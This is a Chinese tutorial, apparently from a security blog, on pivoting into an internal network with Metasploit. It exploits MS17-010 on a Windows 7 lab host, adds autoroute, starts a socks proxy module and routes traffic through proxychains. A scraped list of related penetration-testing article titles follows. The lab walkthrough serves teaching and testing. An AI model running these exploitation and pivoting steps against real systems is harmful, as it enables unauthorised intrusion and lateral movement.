简介

当我们通过MSF拿到一个机器的权限后,想通过MSF搭建socks代理,然后通内网。

MSF中有三个代理模块,分别是socks4a、socks5、socks_unc。一般用 socks4a和socks5进行代理,socks5可以设置用户名和密码;现在新版本的kali已经整合了socks代理。

测试环境

kali: 192.168.95.128

windows7: 192.168.95.169 ; 192.168.70.3

server2012: 192.168.70.2

MSF会话

先扫描一下网段,windows7存在永恒之蓝漏洞,利用msf漏洞利用模块拿shell

这里使用fscan扫描出来windows7存在两张网卡;95网段可以连通;70网段无法连通

msfconsole

search ms17-010

use 0

set rhost 目标主机ip

exploit

成功返回shell,ms17-010权限是系统权限很高

添加路由

使用代理之前,需要先添加路由,让MSF能到达目标机器内网。

这里socks模块只是将代理设置为监听的端口(默认是1080),通过proxychains的流量都转给本地的1080端口,因为这是MSF起的监听端口,所以通过代理走的流量也都能到达内网。

background #将会话置于后台

sessions     #查看后台会话连接

search autoroute

use 0

set sessions 1

run

route print   #打印路由

这时候已经可以访问到server2012机器了,但是到这里只能是msf使用,其它的应用依然无法访问

MSF搭建socks代理

search socks

use 0

options  #查看模块参数

run

连接socks代理

修改proxychains配置

vi  /etc/proxychains4.conf

然后在需要执行的命令前加上 proxychains命令

例如: proxychains ping 192.168.70.2 -c4

声明
提供的技术仅供学习参考测试,利用本文提供的信息造成的直接或间接损失由使用者自行承担。

结语

那些能让你变好的事,最开始也许不容易,但最后一定能成长。

MSF开启socks代理内网渗透相关推荐

  1. msf监听php反弹shell,使用msf进行反弹shell+内网渗透

    首先说明一点,反弹shell的前提是该主机可以执行咱们的恶意命令 反弹shell的原理与灰鸽子的原理是类似的,就是在靶机上执行一个咱们msf精心构造的客户端,使靶机主动回连咱们攻击机的某个端口.下面开 ...

  2. 网络靶场实战-记一次大型内网渗透实践 【完结篇】

    本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景回顾 上回书说到通过一系 ...

  3. 网络靶场实战-记一次大型内网渗透实践 【一】

    本场景是基于"火天网境攻防演训靶场"进行搭建,通过靶场内置的演训导调.演训裁判以及演训运维功能,可以对整个攻防演练过程进行管控和详尽的评估与复盘. 1.场景准备 · 场景名称 某大 ...

  4. 记录一次SQL引起的内网渗透​

    点击上方的终端研发部,右上角选择"设为星标" 作者:i春秋作家 原文:https://bbs.ichunqiu.com/thread-58227-1-1.html 一 . 前言 近 ...

  5. 内网渗透测试 MSF搭建socks代理

    环境搭建: 最终效果为如此,web服务器可以ping通外网和内网两台服务器 外网打点 信息收集 发现端口: 80 http 3306 mysql 敏感目录: /phpMyadmin 数据库弱口令 ro ...

  6. 内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试

    文章目录 搭建靶场 配置虚拟机网络 虚拟机 上线目标1(Target1) Socks代理 简介 正向代理 反向代理 FRP 一层代理 二层代理(多层代理) EW 正向代理 反向代理 二层代理流量转发 ...

  7. 内网渗透代理转发详解及工具介绍

    介绍一下个人网站 欢迎各位大佬光顾 http://www.sec0nd.top 文章目录 前言 正向代理和反向代理 正向代理 反向代理 举例辨别两者 内网渗透中代理的作用 工具介绍 msf nps f ...

  8. 三层网络靶场搭建MSF内网渗透

    三层网络靶场搭建&MSF内网渗透 在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...

  9. 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板

    靶场下载:漏洞详情​​​​​​ 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...

最新文章

  1. 暑期集训3:几何基础 练习题D:  HDU - 2036 ​​​​​​​
  2. 【HDOJ】2209 翻纸牌游戏
  3. 算法---删除排序链表中的重复元素 II
  4. 使用开发者工具调试jsp页面中的脚本
  5. HTMLElement对象
  6. SQL 注入竟然把我们的系统搞挂了
  7. 使用注解方式搭建SpringMVC
  8. 企业LNMP环境应用
  9. 商业分析师的要求与必备技能
  10. 微信公众号网页授权域名和JS接口安全域名配置攻略
  11. 解密阿里云大规模深度学习性能优化实践
  12. P、NP、NPC概念总结
  13. 计算机无法连接网络错误651,Win7宽带连接错误651的原因和解决方法
  14. 想借微商发家?打造千万级分销体系的方法论在这里!
  15. 2.2.1 数据通信系统的模型
  16. 第二十次ScrumMeeting博客
  17. 程序员的编辑器—VIM(怀念Unix下的岁月)
  18. 怎么在excel中对比两列数据并查找重复项
  19. iPhone 设置铃声
  20. hadoop shuffle 学习

热门文章

  1. 前端之表格,表单,列表
  2. 方孔分段的lisp_cad怎么把一条线直接分段
  3. python3 pdf 转 txt
  4. Labview上位机与单片机系统的开发
  5. Map接口的常见方法
  6. Python 凯撒密码
  7. 制作局部区域放大效果(每天一个PS小项目)
  8. 告别下载速度慢!Docker配置阿里云镜像仓库
  9. C#仓库管理系统 2021-06-28
  10. Win7安装VisualC++6.0全程图解